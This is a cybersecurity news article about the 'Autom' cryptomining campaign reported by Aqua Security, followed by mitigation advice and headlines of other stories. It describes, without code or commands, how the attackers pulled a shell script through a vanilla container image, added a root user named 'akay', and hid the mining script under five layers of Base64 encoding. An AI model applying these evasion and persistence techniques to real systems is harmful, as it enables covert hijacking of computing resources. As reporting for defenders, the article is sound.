Cryptomining Malware Uses New Techniques To Hide The Attack & Bypass Security

The Team Nautilus security analysts at Aqua Security has recently caught an ongoing malicious cryptomining campaign that has upgraded to the next level while evolving its new TTPs like:- 

  • Defense mechanismsuch malicious malware and campaigns
  • Evasion tactics
  • Tools
  • Methods

This cryptomining malware has been named as “Autom,” and it has been speculated that since the campaign has evolved so, it has managed to adapt several malicious tactics to hide the attack and evade all the checks of security solutions.

Autom campaign and its evolution

A total of 84 attacks against its honeypot servers have been recorded since it was first spotted in 2019 and among those attacks, four attacks occurred in 2021. While in the third quarter of 2021 alone, the attackers have launched more than 125 attacks in the wild after getting evolved.

While this campaign has been named “Autom,’ only due to the shell script, and during this time period, the threat actors have changed and evolved all their tactics.

When this malicious cryptomining campaign has been spotted for the first time in 2019, at that time during the run of a vanilla image alpine:latest the execution of attack command was run due to which an shell script was downloaded.

Here’s what the security analysts stated:-

“Adversaries commonly use vanilla images along with malicious commands to perform their attacks, because most organizations trust the official images and allow their use.”

Later after downloading the shell script, the malware begins the attack sequence. While in this attack sequence the threat actors get the ability to create a new user account under the name “akay” with root user rights.

At this stage, the attacker abuses the root privileges to execute arbitrary commands on the compromised system to mine cryptocurrency. Even to get around security tools, the malware retrieves five times encoded Base64 obfuscated mining shell script.

The founder and CTO of Bugcrowd, Casey Ellis stated:-

“Evading detection for as long as possible to maximize their time on target and potential for a return has become a core part of an attacker’s job.” 


To mitigate this the experts have recommended some recommendations, and here they are:-

  • Perform dynamic image analysis
  • Monitor container activity
  • Check your environment for misconfigured APIs
  • Limit unsecured inbound or outbound communication

These are the four key mitigating points that users should follow to stay safe and mitigate such malicious malware and campaigns.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.

Balaji N

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Published by
Balaji N

Recent Posts

SSNDOB Marketplace Admin Jailed for Selling millions of Americans Data

In a resounding triumph for justice, U.S. District Judge Kathryn Kimball Mizelle has sentenced Vitalii…

12 hours ago

Is Your Online Store Hacked in a Carding Attack? Here’s an Action Plan to Protect

Hackers are plotting to benefit from the generosity of Halloween, Thanksgiving, and Christmas shoppers using…

15 hours ago

Google Researchers Find Out How ChatGPT Queries Can Collect Personal Data

The LLMs (Large Language Models) are evolving rapidly with continuous advancements in their research and…

15 hours ago

New Android Malware Employs Various Tactics to Deceive Malware Analyst

In the dynamic realm of mobile application security, cybercriminals employ ever more sophisticated forms of…

17 hours ago

DJvu Ransomware Mimic as Cracked Software to Compromise Computers

A recent campaign has been observed to be delivering DJvu ransomware through a loader that…

18 hours ago

Okta Hack: Threat Actors Downloaded all Customer Support System Users’ Data

In a pivotal update to the Okta security incident divulged in October 2023, Okta Security…

19 hours ago